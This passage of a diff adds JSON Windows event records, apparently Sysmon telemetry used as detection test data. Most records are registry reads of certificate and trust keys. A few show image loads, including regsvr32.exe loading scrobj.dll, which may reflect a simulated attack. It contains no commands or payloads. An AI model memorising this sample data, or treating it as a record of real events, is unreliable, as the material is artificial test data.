"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + 
"timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "scrobj.dll", + "image_path": "C:\\Windows\\System32\\scrobj.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236670000, + "unique_pid": 